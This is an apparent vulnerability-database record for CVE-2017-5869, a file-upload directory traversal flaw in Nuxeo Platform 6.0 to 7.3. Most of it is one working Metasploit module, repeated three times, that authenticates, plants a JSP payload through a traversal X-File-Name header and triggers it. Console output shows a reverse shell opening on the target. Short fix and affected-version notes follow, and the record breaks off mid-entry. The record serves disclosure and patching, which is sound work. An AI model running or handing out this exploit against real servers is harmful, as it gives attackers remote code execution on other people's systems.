ID: CVE-2017-5869
Type: cve
Reporter: cve@mitre.org
Modified: 2017-08-16T01:29:00
Description:
Directory traversal vulnerability in the file import feature in Nuxeo Platform 6.0, 7.1, 7.2, and 7.3 allows remote authenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.
{"id": "CVE-2017-5869", "bulletinFamily": "NVD", "title": "CVE-2017-5869", "description": "Directory traversal vulnerability in the file import feature in Nuxeo Platform 6.0, 7.1, 7.2, and 7.3 allows remote authenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.", "published": "2017-03-24T14:59:00", "modified": "2017-08-16T01:29:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5869", "reporter": "cve@mitre.org", "references": ["https://sysdream.com/news/lab/2017-03-23-cve-2017-5869-nuxeo-platform-remote-code-execution/", "https://www.exploit-db.com/exploits/41748/", "http://www.securityfocus.com/bid/97083", "http://www.openwall.com/lists/oss-security/2017/03/23/6"], "cvelist": ["CVE-2017-5869"], "type": "cve", "lastseen": "2020-10-03T13:07:46", "edition": 3, "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-27452", "1337DAY-ID-27420"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106696"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141811"]}, {"type": "exploitdb", "idList": ["EDB-ID:41748"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3BDE07924AD5019982D9337367D7DB4E"]}], "modified": "2020-10-03T13:07:46", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-10-03T13:07:46", "rev": 2}, "vulnersScore": 6.8}, "cpe": ["cpe:/a:nuxeo:nuxeo:7.1", "cpe:/a:nuxeo:nuxeo:7.3", "cpe:/a:nuxeo:nuxeo:7.2", "cpe:/a:nuxeo:nuxeo:6.0"], "affectedSoftware": [{"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "6.0"}, {"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "7.1"}, {"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "7.3"}, {"cpeName": "nuxeo:nuxeo", "name": "nuxeo", "operator": "eq", "version": "7.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", 
"authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:nuxeo:nuxeo:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:nuxeo:nuxeo:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:nuxeo:nuxeo:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:nuxeo:nuxeo:6.0:*:*:*:*:*:*:*"], "cwe": ["CWE-22"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:7.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:7.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:7.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:nuxeo:nuxeo:6.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"zdt": [{"lastseen": "2018-03-06T22:09:52", "description": "Exploit for jsp platform in category web applications", "edition": 1, "published": "2017-03-28T00:00:00", "title": "Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-28T00:00:00", "href": "https://0day.today/exploit/description/27452", "id": "1337DAY-ID-27452", "sourceData": "=begin\r\n# Description\r\n \r\nNuxeo Platform is a content management system for enterprises (CMS).\r\nIt embeds an Apache Tomcat server, and can be managed through a web\r\ninterface.\r\n \r\nOne of its features allows authenticated users to import files to the\r\nplatform.\r\nBy crafting the upload request with a specific ``X-File-Name`` header,\r\none can successfuly upload a file at an arbitrary location of the server\r\nfile system.\r\n \r\nIt is then possible to upload a JSP script to the root directory of the\r\nweb application to execute commands on the remote host operating system.\r\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\r\n``X-File-Name`` header is a way to do so.\r\n \r\n## Details\r\n \r\n**CVE ID**: CVE-2017-5869\r\n \r\n**Access Vector**: network\r\n \r\n**Security Risk**: high\r\n \r\n**Vulnerability**: CWE-434\r\n \r\n**CVSS Base Score**: 8.8\r\n \r\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n \r\n# Proof of Concept\r\n \r\nHere is a metasploit module to exploit this vulnerability:\r\n \r\n=end\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Nuxeo Platform File Upload RCE\",\r\n 'Description' => %q{\r\n The Nuxeo Platform tool is 
vulnerable to an authenticated remote code execution,\r\n thanks to an upload module.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => ['Ronan Kervella <[email\u00a0protected]>'],\r\n 'References' =>\r\n [\r\n ['https://nuxeo.com/', '']\r\n ],\r\n 'Platform' => %w{linux},\r\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],\r\n 'Arch' => ARCH_JAVA,\r\n 'Privileged' => true,\r\n 'Payload' => {},\r\n 'DisclosureDate' => \"\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),\r\n OptString.new('USERNAME', [true, 'A valid username', '']),\r\n OptString.new('PASSWORD', [true, 'Password linked to the username', ''])\r\n ], self.class)\r\n end\r\n \r\n def jsp_filename\r\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\r\n end\r\n \r\n def jsp_path\r\n 'nxserver/nuxeo.war/' + jsp_filename\r\n end\r\n \r\n def nuxeo_login\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\r\n )\r\n \r\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\r\n session_cookie = res.get_cookies\r\n \r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'user_name' => datastore['USERNAME'],\r\n 'user_password' => datastore['PASSWORD'],\r\n 'submit' => 'Connexion'\r\n }\r\n )\r\n return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')\r\n nil\r\n end\r\n \r\n def trigger_shell\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\r\n )\r\n fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200\r\n end\r\n \r\n def exploit\r\n print_status(\"Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\n 
session_cookie = nuxeo_login\r\n if session_cookie\r\n payload_url = normalize_uri(target_uri.path, jsp_filename)\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n 'X-File-Name' => '../../' + jsp_path,\r\n 'X-Batch-Id' => '00',\r\n 'X-File-Size' => '1024',\r\n 'X-File-Type' => '',\r\n 'X-File-Idx' => '0',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n },\r\n 'ctype' => '',\r\n 'data' => payload.encoded\r\n )\r\n fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200\r\n print_status(\"Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.\")\r\n trigger_shell\r\n else\r\n fail_with(Failure::Unknown, 'Unable to login')\r\n end\r\n end\r\n \r\nend\r\n \r\n=begin\r\nModule output:\r\n \r\n```bash\r\nmsf> use exploit/multi/http/nuxeo\r\nmsf exploit(nuxeo) > set USERNAME user1\r\nUSERNAME => user1\r\nmsf exploit(nuxeo) > set PASSWORD password\r\nPASSWORD => password\r\nmsf exploit(nuxeo) > set rhost 192.168.253.132\r\nrhost => 192.168.253.132\r\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\r\npayload => java/jsp_shell_reverse_tcp\r\nmsf exploit(nuxeo) > set lhost 192.168.253.1\r\nlhost => 192.168.253.1\r\nmsf exploit(nuxeo) > exploit\r\n \r\n[-] Handler failed to bind to 192.168.253.1:4444:- -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Authenticating using user1:password\r\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\r\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\r\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\r\n \r\nid\r\nuid=1000(nuxeo) gid=1000(nuxeo)\r\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\r\npwd\r\n/var/lib/nuxeo/server\r\n```\r\n \r\n# Vulnerable code\r\n \r\nThe vulnerable code is located in the\r\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class 
([github\r\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\r\nwhere the header ``X-File-Name`` is not checked.\r\n \r\n# Fix\r\n \r\nNuxeo provided a\r\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\r\nfor this issue.\r\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\r\n \r\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\r\n \r\n# Affected versions\r\n \r\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\r\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\r\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\r\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\r\n \r\n# Unaffected versions\r\n \r\n* Nuxeo 6.0 HF35, released 2017-01-12\r\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\r\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\r\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\r\n \r\n# Credits\r\n \r\nRonan Kervella <[email\u00a0protected]>\r\n \r\n-- SYSDREAM Labs <[email\u00a0protected]> \r\nGPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1\r\n* Website: https://sysdream.com/ \r\n* Twitter: @sysdream\r\n=end\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27452"}, {"lastseen": "2018-02-19T15:24:46", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-03-25T00:00:00", "type": "zdt", "title": "Nuxeo Platform 6.x / 7.x Shell Upload Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-25T00:00:00", "href": "https://0day.today/exploit/description/27420", "id": "1337DAY-ID-27420", "sourceData": "# 
Description\r\n\r\nNuxeo Platform is a content management system for enterprises (CMS).\r\nIt embeds an Apache Tomcat server, and can be managed through a web\r\ninterface.\r\n\r\nOne of its features allows authenticated users to import files to the\r\nplatform.\r\nBy crafting the upload request with a specific ``X-File-Name`` header,\r\none can successfuly upload a file at an arbitrary location of the server\r\nfile system.\r\n\r\nIt is then possible to upload a JSP script to the root directory of the\r\nweb application to execute commands on the remote host operating system.\r\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\r\n``X-File-Name`` header is a way to do so.\r\n\r\n## Details\r\n\r\n**CVE ID**: CVE-2017-5869\r\n\r\n**Access Vector**: network\r\n\r\n**Security Risk**: high\r\n\r\n**Vulnerability**: CWE-434\r\n\r\n**CVSS Base Score**: 8.8\r\n\r\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n# Proof of Concept\r\n\r\nHere is a metasploit module to exploit this vulnerability:\r\n\r\n```ruby\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Nuxeo Platform File Upload RCE\",\r\n 'Description' => %q{\r\n The Nuxeo Platform tool is vulnerable to an\r\nauthenticated remote code execution,\r\n thanks to an upload module.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => ['Ronan Kervella\r\n<[email\u00a0protected]>'],\r\n 'References' =>\r\n [\r\n ['https://nuxeo.com/', '']\r\n ],\r\n 'Platform' => %w{linux},\r\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3',\r\n'Platform' => 'linux'] ],\r\n 'Arch' => ARCH_JAVA,\r\n 'Privileged' => true,\r\n 'Payload' => {},\r\n 'DisclosureDate' => \"\",\r\n 
'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the nuxeo\r\napplication', '/nuxeo']),\r\n OptString.new('USERNAME', [true, 'A valid username', '']),\r\n OptString.new('PASSWORD', [true, 'Password linked to the\r\nusername', ''])\r\n ], self.class)\r\n end\r\n\r\n def jsp_filename\r\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\r\n end\r\n\r\n def jsp_path\r\n 'nxserver/nuxeo.war/' + jsp_filename\r\n end\r\n\r\n def nuxeo_login\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\r\n )\r\n\r\n fail_with(Failure::Unreachable, 'No response received from the\r\ntarget.') unless res\r\n session_cookie = res.get_cookies\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,\r\n'/nxstartup.faces'),\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'user_name' => datastore['USERNAME'],\r\n 'user_password' => datastore['PASSWORD'],\r\n 'submit' => 'Connexion'\r\n }\r\n )\r\n return session_cookie if res && res.code == 302 &&\r\nres.redirection.to_s.include?('view_home.faces')\r\n nil\r\n end\r\n\r\n def trigger_shell\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\r\n )\r\n fail_with(Failure::Unknown, 'Unable to get\r\n#{full_uri}/#{jsp_filename}') unless res && res.code == 200\r\n end\r\n\r\n def exploit\r\n print_status(\"Authenticating using\r\n#{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\n session_cookie = nuxeo_login\r\n if session_cookie\r\n payload_url = normalize_uri(target_uri.path, jsp_filename)\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,\r\n'/site/automation/batch/upload'),\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n 'X-File-Name' => '../../' + jsp_path,\r\n 'X-Batch-Id' => '00',\r\n 'X-File-Size' => '1024',\r\n 'X-File-Type' => '',\r\n 'X-File-Idx' => 
'0',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n },\r\n 'ctype' => '',\r\n 'data' => payload.encoded\r\n )\r\n fail_with(Failure::Unknown, 'Unable to upload the payload')\r\nunless res && res.code == 200\r\n print_status(\"Executing the payload at\r\n#{normalize_uri(target_uri.path, payload_url)}.\")\r\n trigger_shell\r\n else\r\n fail_with(Failure::Unknown, 'Unable to login')\r\n end\r\n end\r\n\r\nend\r\n```\r\n\r\nModule output:\r\n\r\n```bash\r\nmsf> use exploit/multi/http/nuxeo\r\nmsf exploit(nuxeo) > set USERNAME user1\r\nUSERNAME => user1\r\nmsf exploit(nuxeo) > set PASSWORD password\r\nPASSWORD => password\r\nmsf exploit(nuxeo) > set rhost 192.168.253.132\r\nrhost => 192.168.253.132\r\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\r\npayload => java/jsp_shell_reverse_tcp\r\nmsf exploit(nuxeo) > set lhost 192.168.253.1\r\nlhost => 192.168.253.1\r\nmsf exploit(nuxeo) > exploit\r\n\r\n[-] Handler failed to bind to 192.168.253.1:4444:- -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Authenticating using user1:password\r\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\r\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\r\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\r\n\r\nid\r\nuid=1000(nuxeo) gid=1000(nuxeo)\r\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\r\npwd\r\n/var/lib/nuxeo/server\r\n```\r\n\r\n# Vulnerable code\r\n\r\nThe vulnerable code is located in the\r\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github\r\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\r\nwhere the header ``X-File-Name`` is not checked.\r\n\r\n# Fix\r\n\r\nNuxeo provided a\r\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\r\nfor this issue.\r\nA hotfix release is 
also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\r\n\r\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\r\n\r\n# Affected versions\r\n\r\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\r\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\r\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\r\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\r\n\r\n# Unaffected versions\r\n\r\n* Nuxeo 6.0 HF35, released 2017-01-12\r\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\r\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\r\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\r\n\r\n# Credits\r\n\r\nRonan Kervella <[email\u00a0protected]>\r\n\r\n-- \r\nSYSDREAM Labs <[email\u00a0protected]>\r\n\r\nGPG :\r\n47D1 E124 C43E F992 2A2E\r\n1551 8EB4 8CD9 D5B2 59A1\r\n\r\n* Website: https://sysdream.com/\r\n* Twitter: @sysdream\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/27420", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-03-27T23:16:58", "description": "Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit). CVE-2017-5869. Webapps exploit for JSP platform. 
Tags: Metasploit Framework", "published": "2017-03-27T00:00:00", "type": "exploitdb", "title": "Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-27T00:00:00", "id": "EDB-ID:41748", "href": "https://www.exploit-db.com/exploits/41748/", "sourceData": "=begin\r\n# Description\r\n\r\nNuxeo Platform is a content management system for enterprises (CMS).\r\nIt embeds an Apache Tomcat server, and can be managed through a web\r\ninterface.\r\n\r\nOne of its features allows authenticated users to import files to the\r\nplatform.\r\nBy crafting the upload request with a specific ``X-File-Name`` header,\r\none can successfuly upload a file at an arbitrary location of the server\r\nfile system.\r\n\r\nIt is then possible to upload a JSP script to the root directory of the\r\nweb application to execute commands on the remote host operating system.\r\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\r\n``X-File-Name`` header is a way to do so.\r\n\r\n## Details\r\n\r\n**CVE ID**: CVE-2017-5869\r\n\r\n**Access Vector**: network\r\n\r\n**Security Risk**: high\r\n\r\n**Vulnerability**: CWE-434\r\n\r\n**CVSS Base Score**: 8.8\r\n\r\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n# Proof of Concept\r\n\r\nHere is a metasploit module to exploit this vulnerability:\r\n\r\n=end\r\n##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Nuxeo Platform File Upload RCE\",\r\n 'Description' => %q{\r\n The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,\r\n thanks to an upload module.\r\n },\r\n 'License' => 
MSF_LICENSE,\r\n 'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],\r\n 'References' =>\r\n [\r\n ['https://nuxeo.com/', '']\r\n ],\r\n 'Platform' => %w{linux},\r\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],\r\n 'Arch' => ARCH_JAVA,\r\n 'Privileged' => true,\r\n 'Payload' => {},\r\n 'DisclosureDate' => \"\",\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),\r\n OptString.new('USERNAME', [true, 'A valid username', '']),\r\n OptString.new('PASSWORD', [true, 'Password linked to the username', ''])\r\n ], self.class)\r\n end\r\n\r\n def jsp_filename\r\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\r\n end\r\n\r\n def jsp_path\r\n 'nxserver/nuxeo.war/' + jsp_filename\r\n end\r\n\r\n def nuxeo_login\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\r\n )\r\n\r\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\r\n session_cookie = res.get_cookies\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'user_name' => datastore['USERNAME'],\r\n 'user_password' => datastore['PASSWORD'],\r\n 'submit' => 'Connexion'\r\n }\r\n )\r\n return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')\r\n nil\r\n end\r\n\r\n def trigger_shell\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\r\n )\r\n fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200\r\n end\r\n\r\n def exploit\r\n print_status(\"Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\r\n session_cookie = nuxeo_login\r\n if session_cookie\r\n payload_url = normalize_uri(target_uri.path, jsp_filename)\r\n 
res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n 'X-File-Name' => '../../' + jsp_path,\r\n 'X-Batch-Id' => '00',\r\n 'X-File-Size' => '1024',\r\n 'X-File-Type' => '',\r\n 'X-File-Idx' => '0',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n },\r\n 'ctype' => '',\r\n 'data' => payload.encoded\r\n )\r\n fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200\r\n print_status(\"Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.\")\r\n trigger_shell\r\n else\r\n fail_with(Failure::Unknown, 'Unable to login')\r\n end\r\n end\r\n\r\nend\r\n\r\n=begin\r\nModule output:\r\n\r\n```bash\r\nmsf> use exploit/multi/http/nuxeo\r\nmsf exploit(nuxeo) > set USERNAME user1\r\nUSERNAME => user1\r\nmsf exploit(nuxeo) > set PASSWORD password\r\nPASSWORD => password\r\nmsf exploit(nuxeo) > set rhost 192.168.253.132\r\nrhost => 192.168.253.132\r\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\r\npayload => java/jsp_shell_reverse_tcp\r\nmsf exploit(nuxeo) > set lhost 192.168.253.1\r\nlhost => 192.168.253.1\r\nmsf exploit(nuxeo) > exploit\r\n\r\n[-] Handler failed to bind to 192.168.253.1:4444:- -\r\n[*] Started reverse TCP handler on 0.0.0.0:4444\r\n[*] Authenticating using user1:password\r\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\r\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\r\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\r\n\r\nid\r\nuid=1000(nuxeo) gid=1000(nuxeo)\r\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\r\npwd\r\n/var/lib/nuxeo/server\r\n```\r\n\r\n# Vulnerable code\r\n\r\nThe vulnerable code is located in the\r\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class 
([github\r\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\r\nwhere the header ``X-File-Name`` is not checked.\r\n\r\n# Fix\r\n\r\nNuxeo provided a\r\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\r\nfor this issue.\r\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\r\n\r\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\r\n\r\n# Affected versions\r\n\r\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\r\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\r\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\r\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\r\n\r\n# Unaffected versions\r\n\r\n* Nuxeo 6.0 HF35, released 2017-01-12\r\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\r\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\r\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\r\n\r\n# Credits\r\n\r\nRonan Kervella <r.kervella@sysdream.com>\r\n\r\n-- SYSDREAM Labs <labs@sysdream.com> \r\nGPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 \r\n* Website: https://sysdream.com/ \r\n* Twitter: @sysdream \r\n=end", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41748/"}], "packetstorm": [{"lastseen": "2017-03-24T15:22:24", "description": "", "published": "2017-03-24T00:00:00", "type": "packetstorm", "title": "Nuxeo Platform 6.x / 7.x Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-24T00:00:00", "id": "PACKETSTORM:141811", "href": "https://packetstormsecurity.com/files/141811/Nuxeo-Platform-6.x-7.x-Shell-Upload.html", "sourceData": "`# Description \n \nNuxeo Platform is a content management system for enterprises (CMS). 
